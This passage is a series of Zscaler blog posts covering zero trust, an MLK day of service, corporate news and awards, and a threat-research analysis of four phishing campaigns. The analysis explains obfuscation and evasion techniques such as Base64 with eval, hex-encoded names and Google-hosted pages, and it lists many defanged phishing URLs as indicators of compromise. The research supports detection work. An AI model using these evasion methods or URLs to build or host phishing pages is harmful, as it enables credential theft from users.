event. Security teams do have the means and capabilities at their disposal to not only detect such attacks earlier than in this case, but also to minimize their impact by limiting the adversary’s ability to establish a foothold and move laterally across the environment. Aside from monitoring the activity of and on systems and applications that do have privileged access or contain sensitive information, specific access controls can help compartmentalize high-value systems. Access controls and restrictions for such high-value targets can be implemented by applying the concepts of a strict zero trust architecture: Restrict access for outbound traffic from the system or application to the minimum list of applications and resources required to perform its function, as documented by the vendor. Restrict local access of the applications to the minimum required set of privileges, as documented by the vendor. Restrict access to the application or system to only those users that need such access, require multifactor authentication, and limit the permission such users have on the system to the minimum required to perform their intended tasks. In a cloud world, in which the internet continues to replace the local network, applying traditional network security paradigms is a losing proposition. As we continue to use the cloud to enable a mobile workforce and a distributed enterprise, security professionals need to rethink their approach to securing the organizations they work in. Such a world needs to be secured in a cloud-native way, with cloud-enabled security capabilities and a strict zero trust architecture. Mon, 18 Jan 2021 14:39:53 -0800 Martin Walter A Day of Service in Honor of MLK “Life’s most persistent and urgent question is: ‘What are you doing for others?’” – Dr. Martin Luther King, Jr. Every year in mid-January, my daughters and I have an adventure. In the early years, it was picking up trash with other volunteers at a local park, but as they’ve grown, so have the tasks. Two years ago we planted trees at a local park. Last year, we helped clear and plow hard-packed soil to create a 100’ x 8’ community planting bed as a part of a church’s “Dream” garden. This year, in addition to donating to Dorcas ministries (link below), we are building hygiene kits for uninsured Wake County residents. It is climate-controlled and much cleaner than past projects, but still impactful. And whatever we do, it’s always rewarding. As we celebrate Martin Luther King’s birthday this year, there is a different kind of urgency than I’ve felt in years past. We are all facing challenges in the wake of the pandemic, with concerns about our own health and that of our loved ones, as well as the need to juggle work responsibilities with caring for children at home. With so much upheaval, it’s tempting to hunker down and simply try to get through it. But difficult times are exactly when those of us with the good fortune to have our health, a home, and stable jobs should come together to help the most vulnerable members of society. Across the country, communities that were already struggling with low wages, high poverty rates, and food and housing insecurity have been hit particularly hard by the pandemic. As a member of Zscaler’s new Black networking group, B@Z, I’m proud to announce that B@Z is leading a day of service on Monday, January 18, in honor of Dr. Martin Luther King, Jr.’s birthday, and we are inviting all United States Zscaler employees and their families to participate. Regrettably, it won't be in person this year, but we look forward to widespread participation as the needs are tremendous. The B@Z team has identified six organizations we are encouraging employees to “shop” for or donate to. They include: CityTeam HomeFirst Services Raleigh Rescue Mission Dorcas Ministries Feeding America Food Bank of Central & Eastern North Carolina Dr. King’s life’s work centered around giving a voice to the voiceless and, in that spirit, we hope to share our good fortune with others. We also hope to celebrate his life by offering a broader sense of his legacy and an opportunity to learn more about him. About Dr. Martin Luther King, Jr. Many Americans know Dr. King for one speech he delivered in August 1963. It was truly great and consequential, but it was just one of more than 2,500 speeches King delivered in his 13 years of public life. He wrote five books and his papers are preserved in seven volumes. America’s most influential advocate for peace and justice, Dr. King campaigned, protested, and preached on behalf of people who had been marginalized by those in power. He was deeply committed to nonviolence, but he pushed hard against laws that he believed were unjust and was arrested repeatedly. He was a skillful strategist and teamed with powerful thinkers and doers who coordinated the complex and dangerous Civil Rights Movement. With his father, Dr. King was the co-leader of Ebenezer Baptist Church in Atlanta, which gave him his first platform for addressing social ills. He spoke against the Vietnam War, segregation, and the mistreatment of poor people, regardless of color.1,2 He formed alliances with politicians, including Robert F. Kennedy, whose support enabled his release from prison during one of his many arrests.3 He engaged with leaders, including Malcolm X and Billy Graham, from other religions and social standings to advance his ideals. He didn't always find support, but he was willing to give others an opportunity to be on the right side of history. Whether he was sitting at a “whites-only” lunch counter or leading a peaceful march or demonstrating for voting rights, Dr. King was seen as a threat to the American status quo.4 He was arrested at least 30 times in various civil rights protest actions.3,5 Here are some examples6: January 26, 1956 – He was arrested in Montgomery, Alabama, as part of a “Get Tough” campaign to intimidate the bus boycotters. Four days later, on January 30, his home was bombed. October 19, 1960 – He was arrested in Atlanta, Georgia, during a sit-in while waiting to be served at a restaurant. He was sentenced to four months in jail, but after intervention by then-presidential candidate John Kennedy and his brother Robert Kennedy, he was released. July 27, 1962 – He was arrested and jailed for holding a prayer vigil in Albany, Georgia. April 12, 1963 – He and Ralph Abernathy were arrested in Birmingham, Alabama, for demonstrating without a permit. During his time in jail, he wrote what is now known as his historic “Letter from Birmingham Jail.” February 2, 1965 – He was arrested in Selma, Alabama, during a voting rights demonstration. Demonstrations continued and a young man was shot by police. In response, organizers planned a 54-mile march from Selma to the state capitol in Montgomery. Marchers were brutally attacked by law enforcement as they crossed the Edmund Pettus Bridge in Selma, a day that came to be known as Bloody Sunday. Dr. King was instrumental in the successful actions of multiple civil rights groups, including the National Association for the Advancement of Colored People (NAACP). And in the mid-1950s, the Montgomery Improvement Association (MIA) was formed with the executive committee of the NAACP and the officers of the Montgomery chapter of the NAACP (which was banned at that time in Alabama) to improve the living conditions and end segregation in the city. Rosa Parks was the secretary of the local organization, and her defiance on the bus gave Dr. King, the leader of the MIA, a wider platform that extended beyond the church congregation he led at the time.7 The steward of King’s legacy A theme in the musical Hamilton is that one has no control over “Who lives, who dies, who tells your story.” And just as Elizabeth Hamilton became the champion of her late husband’s legacy, Dr. King's widow, Coretta Scott King, worked tirelessly through the remainder of her life (she survived him by almost 40 years) to ensure her husband's legacy wasn't tarnished by those who did not share his vision. Because of Coretta Scott King’s efforts, we celebrate Dr. King’s birthday as a federal holiday and his story is told to schoolchildren across America. While his life has been filtered and packaged in many ways to adapt to various audiences, we know that when history is being made, it isn't always neat and tidy. Undeterred in the face of threats, setbacks, arrests, and violence, Dr. King knew that “forward” was the only way to go and that, ultimately, the arc of the moral universe would bend towards justice. Dr. King’s efforts continue to inspire new generations of organizers and activists in pursuit of justice and equality, and his commitment to nonviolence provides a roadmap for societal changes. Three facts about Dr. King you may not know: 1. King’s birth name was Michael, not Martin. The civil rights leader was born Michael King Jr. on January 15, 1929. In 1934, however, his father, a pastor at Atlanta’s Ebenezer Baptist Church, traveled to Germany and became inspired by the Protestant Reformation leader Martin Luther. As a result, King Sr. changed his own name as well as that of his 5-year-old son.10 2. King entered college at the age of 15. King was such a gifted student that he skipped grades nine and 12 before enrolling in 1944 at Morehouse College, the alma mater of his father and maternal grandfather. Although he was the son, grandson, and great-grandson of Baptist ministers, King did not intend to follow the family vocation until Morehouse president Benjamin E. Mays, a noted theologian, convinced him otherwise. King was ordained before graduating college with a degree in sociology.10 3. King received his doctorate in systematic theology. After earning a divinity degree from Pennsylvania’s Crozer Theological Seminary, King attended graduate school at Boston University, where he received his Ph.D. degree in 1955. The title of his dissertation was “A Comparison of the Conceptions of God in the Thinking of Paul Tillich and Henry Nelson Wieman.”10 I am grateful to be a part of the Zscaler family, working among kind, compassionate professionals all across the organization. My B@Z team members and I look forward to a successful and rewarding day of service in celebration of Dr. King’s life and legacy. 1From MLK to John Lewis, Ebenezer Baptist Church has been a haven for civil rights ( 2 3 4 5! 6Martin Luther King, Jr. Was Arrested 29 Times For Committing These “Crimes” ( 7NAACP | Dr. Martin Luther King Jr. 8Southern Christian Leadership Conference (SCLC) - Civil Rights (U.S. National Park Service) ( 9Martin Luther King Jr. - SNCC Digital Gateway SNCC Digital Gateway 10 Mon, 18 Jan 2021 08:00:02 -0800 Wendi Lester The Hindsight of 2020 Brings Fresh Perspective for 2021 Happy New Year! None of us could have predicted the tumultuous year that became 2020. Yet the dawn of a new year provides a fresh perspective to better prepare for the opportunities ahead. This past year reaffirmed for all of us, the importance of working together towards a common goal and I am immensely proud of the way in which the Zscaler team worked tirelessly to support the rapidly changing needs of our customers. Almost overnight, organizations around the globe were forced to shift to a work-from-anywhere approach. Zscaler responded quickly to ensure the safety and productivity of employees everywhere. Our Zero Trust Exchange scaled flawlessly as we experienced up to 12x the traffic of pre-pandemic times. Through a comprehensive approach to securing users, data, and applications, Zscaler was able to help customers navigate the unknown with speed and confidence. While our primary focus over the course of 2020 was ensuring the continued productivity of our customers and the safety of our employees, Zscaler had a notable year in several key areas. Market Leadership The entire Zscaler team is humbled and immensely proud to be recognized by Gartner as the only leader in the Secure Web Gateway Magic Quadrant. A result that is the culmination of 10 years of Magic Quadrant leadership and a recognition of our Zero Trust strategy and execution. Going Beyond Limits Zscaler closed 2020 with our Zenith Live virtual event with over 14,000 customers and partners registering to join us to hear the latest innovations in cloud security and digital transformation along with best practices from over 80 customers, including more than 40 CIOs, CISOs, and CTOs. Zero Trust Extends to the Cloud The Zscaler innovation engine is accelerating and we have recently introduced Zscaler Cloud Protection (ZCP), which extends our zero trust capabilities to protect workloads in the public cloud. We are excited that ZCP has been recognized by CRN as one of the top 10 hottest security tools. Trusted Advisor The recent SolarWinds attacks are a stark reminder of the need for continued vigilance. Zscaler has been closely monitoring the situation and is here to help organizations safely navigate questions related to this and other emerging threats. Connect with us to request your security assessment. The Team At Zscaler, we value diversity and view our people as our greatest asset. It’s for this reason that I am extremely proud that Zscaler was the recipient of the 2021 Bay Area Great Place to Work award. As we continue to navigate the weeks and months ahead, Zscaler is committed to being the trusted advisor to organizations seeking to accelerate their secure digital transformation journey. We are here to assist you and your organization in any way we can. Thu, 14 Jan 2021 12:10:00 -0800 Jay Chaudhry Zscaler Named a 2021 Glassdoor “Best Place to Work” Zscaler is hiring company-wide—check out our careers page. To all of our employees who have taken the time to review Zscaler on Glassdoor, thank you. We appreciate your feedback and for taking the time to share your perspectives on what makes Zscaler one of the best places to work in 2021 and beyond. We know that the phrase “a place to work” took a new, less-literal meaning last year, as COVID forced all of us around the world to swap our in-office setups for a myriad of impromptu home offices. Unlike other awards, there is no self-nomination or application process with Glassdoor. Instead, it's entirely based on the candid feedback Zscaler employees have voluntarily and anonymously shared. To determine the award’s winners, Glassdoor evaluates all company reviews shared by employees over the past year. For that reason, it’s incredibly humbling, particularly for those of us in People and Culture, to see Zscaler named to Glassdoor's 2021 list of Best Places to Work, even as we navigate these strange and unprecedented times. Despite the challenges of not being able to see each other and work together in person for almost a year now, Zscaler has yet to slow down from either a technology or business perspective—and we whole-heartedly attribute this to our employees’ dedication to customers, driving innovation and executing on priorities, hiring great people (including hundreds that have never been inside a Zscaler office), and collaborating and celebrating team wins in spite of physical distances. Zscaler is powered by five core values Zscaler's success, both in terms of business trajectory and as a great place to work, has been built on our core values, which have always been fundamental to everything we do. Here’s a closer look at those values: Teamwork We celebrate together. We openly share information. We move as one. Open communications (candor over politics) When it comes to discussing what’s right, what’s wrong, and what we can do better, nothing is off the table. Although we have and continue to grow at a rapid pace, it’s important to foster an environment where employees feel secure sharing their opinions with others. Passion (over self-interest): We are fiercely passionate about our work, our company, our colleagues, our customers, and our partners. As an incredibly diverse company, we understand that the passions of our employees may differ, however, this is what continues to make us successful. Innovation: We are driven to not only innovate cloud transformation through our products but to also innovate in our jobs, whether an engineer, marketer, salesperson, or lawyer. Customer obsession We are, above all else, obsessed with our customers’ success. I see us consistently succeeding at this by how we treat customers as partners — not prospects. Want to join the Zscaler team? In 2021, Zscaler plans to grow our team as we continue our mission of securely enabling digital transformation for enterprises across the globe. We’re always looking for top-notch talent to join our organization and I encourage you to learn more about some of our current openings. Since the beginning, Zscaler has been a critical business enabler for companies as they move toward a secure, cloud-enabled digital future. If you thrive in a fast-paced environment that will challenge you to do your best work, join us! You will find a supportive culture that celebrates collaboration and creative thinking. You can see your ideas make a tangible difference at Zscaler and for Zscaler customers. And that can have a very real impact on your career. Wed, 13 Jan 2021 08:00:02 -0800 Greg Pappas New Phishing Trends and Evasion Techniques Zscaler ThreatLabZ researchers recently came across multiple phishing campaigns using novel obfuscation and evasion techniques. In this blog, we will present an analysis of four phishing campaigns and the various obfuscation methods used in each, also describing some of the tools the attackers used to obfuscate their JavaScript code. JavaScript is a powerful, flexible, and popular scripting language used in numerous web applications. There are many packers and obfuscators available to reduce the size of the JavaScript code, to hide business logic, and make the source code unreadable, and attackers also take advantage of these tools. Why obfuscate? Each day, security engines are becoming smarter, using machine learning, heuristics, image recognition, and other innovations to detect phishing attacks. In parallel, attackers are applying new and sophisticated techniques for evading detection, including the use of obfuscation and by hosting phishing content on trusted providers such as Google hosting domains. The main purpose of code obfuscation is to protect exposed code by making it extremely hard to decipher and understand, but obfuscation is also heavily used to bypass automated URL analysis engines which prolongs the malware’s survival. Obfuscation tools are also used by many legitimate websites to prevent their code from analysis and theft. Phishing Campaign 1: This campaign is sophisticated, as demonstrated by the well-designed phishing pages that are difficult to distinguish from legitimate pages. The attackers used the latest tactics to evade detection from signature-based scan engines, with most of the JavaScript code being obfuscated. URL: tawooos[.]com/commonn/login/?code=<Mail ID> Figure 1: Microsoft login phishing page Obfuscated part of source code The tool used to obfuscate is JavaScript Obfuscator 4.3. It's readily available on multiple free software download sites. In Figure 2, the portion highlighted in red is the function that performs the deobfuscation and the portion highlighted in blue is an argument to that function. You can see that there are many backquotes in the source code (highlighted in yellow). This function removes the backquotes and decodes the rest of the data and returns the decoded code. Figure 2: Microsoft login phishing page source code Deobfuscated source code A few keywords in the source code are highlighted below. The presence of all of these keywords together can be used to flag this page as phishing. Figure 3: Deobfuscated source code After sending the credentials to the command-and-control (C&C) server, the victim gets redirected to a legitimate Microsoft site. Figure 4: PCAP of phishing page sending the credentials to the server As the phishing pages are obfuscated, they are undetected by analysis engines. Figure 5: No VT detections Phishing Campaign 2: In this case, the entire source code has been obscured with multilayered obfuscation. The first layer is using the Eval Execution obfuscation and Base64 encoding. All of these phishing pages were seen to be hosted on storage.googleapis[.]com. Like Amazon Simple Storage Service (Amazon S3), storage.googleapis[.]com is a hosting domain, used to store and access data on Google Cloud. Many analysis engines whitelist these domains, and attackers take advantage of the fact that these domains/IPs belong to trusted sources. http://storage.googleapis[.]com/asmuggishly-757767673/billing.html Figure 6: Chase Phishing page Part of the source code is Base64 encoded, which gets decoded at runtime by atob() and then executed by the eval() function. Figure 7: Source code of Chase phishing page The following is the code after one first round of deobfuscation. We can notice that it is still heavily obfuscated and not in a readable format. This is a hex encoding function and variable names obfuscation, in which the variable and function names and the strings in the code are being obfuscated using hexadecimal patterns to make the JavaScript code hard to read and detect. Figure 8: Source code after one round of deobfuscation After accepting the user credentials, they are sent across to hxxps://moneysmtp[.]com/email-list/chase-nww/action.php, which is controlled by the attacker, and then redirects the user to the legitimate Chase website. Figure 9: PCAP of phishing page sending the credentials to the server Below are snapshots of a few phishing pages targeting different brands using the same multilevel obfuscation techniques. Figure 10: Dropbox phishing page Figure 11: Microsoft phishing page Phishing Campaign 3: is a mobile platform used for building mobile apps hosted by Firebase, which is Google’s mobile app platform. Under this category, all the phishing pages are hosted on the domain and use SSL certificates issued by In this scenario, phishing pages are partially obfuscated by hex-encoding variable names obfuscation, as described in the previous case. Here, the tool that is used to obfuscate the source code is JavaScript Obfuscator. We believe this tool is also utilized in phishing campaign 2 for some level of obfuscation. This is a free tool and has multiple levels for obfuscation, such as Low, Medium, and High. The tool is available on GitHub: Online version: This variant is mostly targeting Microsoft. Figure 12: OneDrive phishing page Figure 13: OneDrive phishing page source code Figure 14: Phishing page source code after deobfuscation As we can see how the attackers are continuously abusing Google's trusted domains, the graph below gives a peek into the number of phishing pages hosted on storage.googleapis[.]com and * seen across the Zscaler cloud. (These stats include all blocked transactions and are not specific to the cases in this analysis.) Figure 15: December 2020 blocked transactions for storage.googleapis[.]com and * Phishing Campaign 4: This variant differs from the previous three cases, where the evasion technique was JavaScript obfuscation. In this fourth scenario, attackers are using embedded Base64 images for evasion, achieved by increasing the size of the source code. The campaign involves adding all the required images in the source code itself in the Base64-encoded format, to make it difficult for the analysis engines to detect these phishing pages. Under this variant, most of the phishing pages are hosted on compromised WordPress websites and target Microsoft brand. Figure 16: Microsoft phishing page Figure 17: Source code of Base64 encoded images Zscaler has been successfully detecting and blocking all the four variants described in this report. Figure 18: Phishing pages seen on Zscaler cloud between Nov 2020 and Jan 2021 Conclusion Phishing attacks have always been on the rise. As the security products are upgrading their detection methodologies, attackers have also upped the ante by evolving the way in which the phishing content is being delivered as well as tactics being leveraged to make the phishing pages stay undetected for longer period. Zscaler ThreatLabZ team continues to monitor these campaigns, as well as others, to help keep our customers safe from phishing attacks. Indicators of Compromise: Campaign 1: 1solutionpbt[.]com/mpl/officev4/ 3dmerchant[.]com/css/officev4/ a2zconsultant[.]com/one/officev4/ adbmedwaste[.]club/crist/audio/ aderarty[.]club/manuel/audio/ adpngo[.]in/one/officev4/ alnada-eg[.]com/common/oauth/ alphanettingsolutions[.]com/one/officev4/ alqudari[.]com/bui/ amorexigente[.]org[.]br/eni/offi/ amr[.]rmal[.]com[.]sa/sui/ annyrorse[.]com/officev4/ antliaworks[.]com/one/officev4/ aoeioanc[.]com/zimc/ aprilwight[.]com/.well-known/officev4/ ascendrsps[.]com/.well-known/officev4/ atone-health[.]co[.]uk/aaakhis/ auxczvbb[.]tk/acb/pcvbm/ bandmusicconnection[.]com/jmz/officev4/ bayfieldadvisers[.]com/omfa/ beebay[.]biz/ed/officev4/ beijingmark[.]com/asvii/aidofficev4kv0f9/ bergenintemational[.]com/omfa/ berioacn[.]com/saga/ bestdevelopers[.]in/tui/ bestsoundbases[.]com/zui/xqu/ binceste[.]com/xec/ bnet[.]russianviptravel[.]com/wap[.]secure/ breathpunch[.]com/officev4/ building-inspections[.]com/holu/mcz/ cauproviden[.]ml/common/login/ chespicac[.]com/tesd/ cheyennedormitory[.]com/officev4/ cilipadi[.]net/common/oauth/ classicnet[.]in/secure/ clougheybowlingclub[.]co[.]uk/printrecording/officev4/ coachcuz[.]com/.well-known/officev4/ comproautoschocados[.]cl/sui/ contraprova[.]com[.]br/vr/officev4/ cozmyklaw[.]com/.well-known/officev4/ cracksense[.]com/ww/lk4/ crossroadschurchjenks[.]com/cy/officev4/ dcare-eg[.]com/hols/officev4/ dealercarshare[.]com/officev44/ deskimps[.]com/delc/ domefavors[.]com/menc/ donatecaballero[.]com/common/login/ donmikia[.]uk/ches/ drivangalindo[.]com[.]br/officev4/ efimilos[.]com/officev44/ elmoprofessional[.]com/officev4/ embedinn[.]com/.well-known/officev4/ eoianac[.]com/thuc/ esbonacorp[.]pe/maz/officev4/ esquadraocelular[.]com[.]br/.well-known/officev4/ fanvironmental[.]club/dxb/audio/ fatsofleece[.]com/officev4/ fewasoc[.]com/nomac/ filmtvdb[.]net/avcnm/ firekillertech[.]com/tui/ forumwebsitehosting[.]com/tui/ friendsoftoto[.]com/incub/incub/ galaxycarcare[.]com/.well-known/officev4/ geekshub[.]com/mowa/officev4/ getyourads[.]xyz/officev4/ globalseedsindia[.]com/one/officev4/ graysmail[.]com/gkala/ gtechsoftware[.]in/.well-known/officev4/ gvihardwares[.]com/.well-known/mm/me/ healestbenefits[.]com/one/officev4/ hpma[.]in/.well-known/officev4/ husdocssl[.]ml/common/login/ ipe[.]unsa[.]edu[.]ar/richhhhh/ ipservercr[.]com/aui/ iwsas[.]com/.well-known/officev4/ janalamas[.]com/lcn/ japanesport[.]com/aa/officev4/ jataq[.]com/.well-known/officev4/ jerioanc[.]com/dasex/ jornalcorreiodovale[.]com[.]br/mcv/moz/ k9apparels[.]com/in/officev4/ kaliony[.]bootydev[.]co[.]uk/resources/vbn/tdds/ kol-voip[.]life/topt/ kontakllc[.]com/m12/muz/ lakewaydirectory[.]com/aa/officev4/ lanuevadelpueblo[.]com/.well-known/officev4/ linpelts[.]com/decx/ livademir[.]com/common/auth/ manacinema[.]com/dsd/managerssss/ mc-solutions[.]com/css/officev4/ mellifluousweb[.]net/common/oauth/ millcityingsstudios[.]icu/.well-known/officev4/ mjhs-mu[.]org/common/login/ mshdigital4u[.]com/wp-errs/officev4/ mycloudquant[.]com/common/ nationalstandardtrustsavings[.]com/in/officev4/ newbrunswickwebdesign[.]com/officev44/ nms-sy[.]com/.well-known/officev4/ nmvformacion[.]com/common/login/ nrg91[.]gr/wp-includes/pomo/wp_includesss/bodsanfr/officev4/ oamii[.]com/css/officev4/ pastryrinse[.]com/wp_includesss/officev4/ pathwaysflp[.]com/cgi/officev4/ peeschute[.]com/.well-known/officev4/ perduepavementsolutions[.]com/officev44/ phenoindia[.]com/st/officev4/ pinazindustries[.]com/common/login/ plombierhochelagamaisonneuve[.]ca/officev4/ poligamografico[.]com/.well-known/officev4/ poophawseholev[.]com/**bc34n**/ precipitateafloat[.]com/officev4/ productcreationprofit[.]com/wps/officev4/ production[.]kaplanstock[.]com/wps/officev4/ protrainservices[.]com/dapot/ pruebaeme[.]pinfo[.]co/wp-file/officev4/ pwanprime[.]com/ioui/ rajputanaonline[.]com/one/officev4/ reversespeech[.]org/database1/officev4/ riceroadssuite[.]xyz/efkvrelsziteefj/ ringacandy[.]net/wpnews/officev4/ rooftimegc[.]com/officev4/ roshanpackages[.]com[.]pk/wp-includes/wp_includess/offficees/officev4/ royalpromotion[.]ch/common/oauth/ rrssserralheria[.]com[.]br/cn/officev4/ saltacil[.]com/asiom/ samh-conglomerat[.]com/.well-known/officev4/ satnampsyllium[.]com/aa/officev4/ securemessage2020[.]net/bn/cbnzxc/ server213-171-197-190[.]live-servers[.]net/commonn/oauth/ shizzades[.]com/.well-known/officev4/ siddiquiofindia[.]com/.well-known/officev4/ sjrfood[.]com/wp-includes/pomo/wp_includes/officev4/ smartclickearn[.]com/afxcyc/ staronepestcontrol[.]co[.]in/.well-known/officev4/ summitmicrosystems[.]com/officev44/ sushiyany[.]com/ok/officev4/ tapali[.]com[.]pk/pc/officev4/ tdcpk[.]org/.well-known/officev4/ tenbellsnyc[.]com/exchange/officev4/ title5inspector[.]com/custom/officev4/ tombintery[.]com/den/ traviskidd[.]net/tui/ umcstmarks[.]org/ofc/officev4/ urinaryfoyer[.]com/officev4/ urupatopfest[.]com[.]br/epla/mzx/ vedrunapalamos[.]org/commonn/oauth/ vivirsinfronteras[.]cl/sui/ vo-icetech[.]live/topt/ volgaboutique[.]com/.well-known/officev4/ webinar[.]eventcasterindia[.]com/officev4/ webqoder[.]com/login/index[.]php wecontainmultitudes[.]world/tui/ whizz[.]pk/.well-known/officev4/ wideneed[.]com/.well-known/officev4/ www[.]aydinlarizabe[.]com[.]tr/common/ www[.]azia[.]ca/azure/eiirffice4049/ www[.]bagstailor[.]com/jkm/ www[.]cap-cap[.]md/addon/plugin/ www[.]chitrakootdham[.]com/kip/ www[.]friss[.]com[.]ec/addin/pluggin/ www[.]fxtokeninvest[.]com/csss/0d9d0fficev40d0d/ www[.]gdsi[.]co[.]za/able/903uuisfficev4db/ www[.]gigacorp[.]com[.]ar/excel/officev4/ www[.]radiodestellosdeluz[.]com/cffm/officev4knsioe3/ www[.]teotozmaskesi[.]com/mvip/ www[.]unique-ltd[.]com/ofz/mzu/ www[.]vedantacareerforum[.]in/addin/plugins/ www[.]weblifeinfotech[.]com/.well-known/officev4/ www[.]yellowpowerghana[.]com/admin/agree/ Campaign 2: storage[.]googleapis[.]com/alimli-147731386/index[.]html storage[.]googleapis[.]com/acabouca-827409132/index[.]html storage[.]googleapis[.]com/arecollectedly-745846914/index[.]html storage[.]googleapis[.]com/asublaryngeal-942401075/index[.]html storage[.]googleapis[.]com/aincogent-763500794/index[.]html storage[.]googleapis[.]com/acurrock-418037438/index[.]html storage[.]googleapis[.]com/aappendorontgenography-768893843/index[.]html storage[.]googleapis[.]com/atidemark-450148136/index[.]html storage[.]googleapis[.]com/ainsulse-944751843/index[.]html storage[.]googleapis[.]com/agrege-856858175/index[.]html storage[.]googleapis[.]com/anonconsciously-414681870/index[.]html storage[.]googleapis[.]com/aabacuses-222389253/index[.]html storage[.]googleapis[.]com/asmuggishly-757767673/billing[.]html storage[.]googleapis[.]com/awebelos-698265298/index[.]html storage[.]googleapis[.]com/agroover-952673710/index[.]html storage[.]googleapis[.]com/acalibres-620331939/index[.]html storage[.]googleapis[.]com/atranshumant-443099926/index[.]html storage[.]googleapis[.]com/asyconia-659992695/login[.]html storage[.]googleapis[.]com/apenfieldite-92629163/index[.]html storage[.]googleapis[.]com/atornillos-106102152/index[.]html storage[.]googleapis[.]com/afoveae-583108632/index[.]html storage[.]googleapis[.]com/apapilio-458653235/stage1[.]html storage[.]googleapis[.]com/akimchee-439724010/index[.]html storage[.]googleapis[.]com/astrick-186905561/index[.]html storage[.]googleapis[.]com/ahoardward-946940086/index[.]html storage[.]googleapis[.]com/axanthones-495191651/index[.]html storage[.]googleapis[.]com/amegilphs-163639534/index[.]html storage[.]googleapis[.]com/adottling-195946905/index[.]html storage[.]googleapis[.]com/amoslemin-967310995/index[.]html storage[.]googleapis[.]com/acinques-665639902/login[.]html storage[.]googleapis[.]com/aunsacrificed-190687410/index[.]html storage[.]googleapis[.]com/ascrofuloderma-46621213/index[.]html storage[.]googleapis[.]com/auntwirl-391340861/index[.]html storage[.]googleapis[.]com/aimparting-68711433/index[.]html storage[.]googleapis[.]com/aatalantis-739623290/index[.]html storage[.]googleapis[.]com/abegruntle-40246949/index[.]html storage[.]googleapis[.]com/aconceptualised-470215097/index[.]html storage[.]googleapis[.]com/arudderhead-370810423/index[.]html storage[.]googleapis[.]com/aastromancer-398680604/index[.]html storage[.]googleapis[.]com/apa-317407023/index[.]html storage[.]googleapis[.]com/aamphioxus-906636459/index[.]html storage[.]googleapis[.]com/apontoneer-591920887/login[.]html storage[.]googleapis[.]com/aprerepresentation-66370527/index[.]html storage[.]googleapis[.]com/aunroyalness-974087096/index[.]html storage[.]googleapis[.]com/aabietate-713295939/index[.]html storage[.]googleapis[.]com/anefas-17843827/login[.]html storage[.]googleapis[.]com/anonhabituating-594465665/index[.]html storage[.]googleapis[.]com/aintervalometer-123954896/index[.]html storage[.]googleapis[.]com/aherdess-767357057/index[.]html storage[.]googleapis[.]com/apardonless-780884267/index[.]html storage[.]googleapis[.]com/agermanely-776975203/index[.]html storage[.]googleapis[.]com/adaylighted-903538410/index[.]html storage[.]googleapis[.]com/anoneternally-982088190/index[.]html storage[.]googleapis[.]com/aunstacked-984917203/index[.]html storage[.]googleapis[.]com/arhopalocerous-457551896/index[.]html storage[.]googleapis[.]com/aautosensitized-682287836/index[.]html storage[.]googleapis[.]com/avirilisms-842115393/index[.]html storage[.]googleapis[.]com/aarbalo-251593828/index[.]html storage[.]googleapis[.]com/asyringitis-538839216/index[.]html storage[.]googleapis[.]com/acionorrhaphia-41254689/index[.]html storage[.]googleapis[.]com/apavises-321779368/index[.]html storage[.]googleapis[.]com/aundiscernably-733914186/index[.]html storage[.]googleapis[.]com/aunregard-438947492/emp[.]html storage[.]googleapis[.]com/aforetelling-819024589/index[.]html storage[.]googleapis[.]com/aphellogen-38165975/index[.]html storage[.]googleapis[.]com/aunvirtuous-274079806/index[.]html storage[.]googleapis[.]com/aelectant-280636513/index[.]html storage[.]googleapis[.]com/asclerae-148597782/index[.]html storage[.]googleapis[.]com/aidaein-829771506/index[.]html storage[.]googleapis[.]com/aterremotive-103281912/index[.]html storage[.]googleapis[.]com/agalactorrhoea-9550585/index[.]html storage[.]googleapis[.]com/atizzy-269292408/index[.]html storage[.]googleapis[.]com/acital-822541724/index[.]html storage[.]googleapis[.]com/aprotriaene-335157269/index[.]html storage[.]googleapis[.]com/ascholarch-890788164/index[.]html storage[.]googleapis[.]com/aprediscontinuance-732910131/index[.]html storage[.]googleapis[.]com/asubfestive-203388889/index[.]html storage[.]googleapis[.]com/afulani-210582469/index[.]html storage[.]googleapis[.]com/adaedal-37002271/index[.]html storage[.]googleapis[.]com/aserpentarii-284490402/index[.]html storage[.]googleapis[.]com/azax-39729869/index[.]html storage[.]googleapis[.]com/asynonymatic-139119700/index[.]html storage[.]googleapis[.]com/aaedegi-836148196/index[.]html storage[.]googleapis[.]com/aoperations-27053020/index[.]html storage[.]googleapis[.]com/aproctoscopies-858386799/index[.]html storage[.]googleapis[.]com/atetramin-839735637/index[.]html storage[.]googleapis[.]com/apeshkash-437756860/index[.]html storage[.]googleapis[.]com/aallylate-704586416/index[.]html storage[.]googleapis[.]com/amaria-707832457/index[.]html storage[.]googleapis[.]com/ahammers-75087009/index[.]html storage[.]googleapis[.]com/aorthopterology-195657039/index[.]html storage[.]googleapis[.]com/agnarliness-34634799/index[.]html storage[.]googleapis[.]com/alechriodont-807475378/index[.]html storage[.]googleapis[.]com/afloodlike-845296568/thank-you[.]html storage[.]googleapis[.]com/afloodlike-845296568/ccdetails[.]html storage[.]googleapis[.]com/aengleim-22202313/index[.]html storage[.]googleapis[.]com/aozokerit-940378069/index[.]html storage[.]googleapis[.]com/anonblended-222328769/index[.]html storage[.]googleapis[.]com/ahough-723819821/index[.]html storage[.]googleapis[.]com/aenwrapped-497258674/index[.]html storage[.]googleapis[.]com/ascombresox-752589947/index[.]html storage[.]googleapis[.]com/ahennaing-195361189/index[.]html storage[.]googleapis[.]com/apackage-889059598/index[.]html storage[.]googleapis[.]com/acerithium-715663857/index[.]html storage[.]googleapis[.]com/asemilegislatively-737555048/index[.]html storage[.]googleapis[.]com/areimpart-731291280/index[.]html storage[.]googleapis[.]com/aschizophrenic-852501158/index[.]html storage[.]googleapis[.]com/aostraeacea-303476625/surf5[.]html storage[.]googleapis[.]com/aostraeacea-303476625/surf2[.]html storage[.]googleapis[.]com/aostraeacea-303476625/surf4[.]html storage[.]googleapis[.]com/acryptocarp-224010971/index[.]html storage[.]googleapis[.]com/asangil-455740481/index[.]html storage[.]googleapis[.]com/aemendatory-273709545/index[.]html storage[.]googleapis[.]com/atripersonalism-844191482/index[.]html storage[.]googleapis[.]com/arituale-126920889/index[.]html storage[.]googleapis[.]com/afirecrest-55660520/index[.]html storage[.]googleapis[.]com/atostao-328917181/index[.]html storage[.]googleapis[.]com/akartvelian-558252283/yahoo[.]html storage[.]googleapis[.]com/acondescendent-298330894/index[.]html storage[.]googleapis[.]com/aindeliberately-897258294/index[.]html storage[.]googleapis[.]com/acartooned-590869782/index[.]html storage[.]googleapis[.]com/anonabsolution-546507296/index[.]html storage[.]googleapis[.]com/aprehallux-831372274/index[.]html 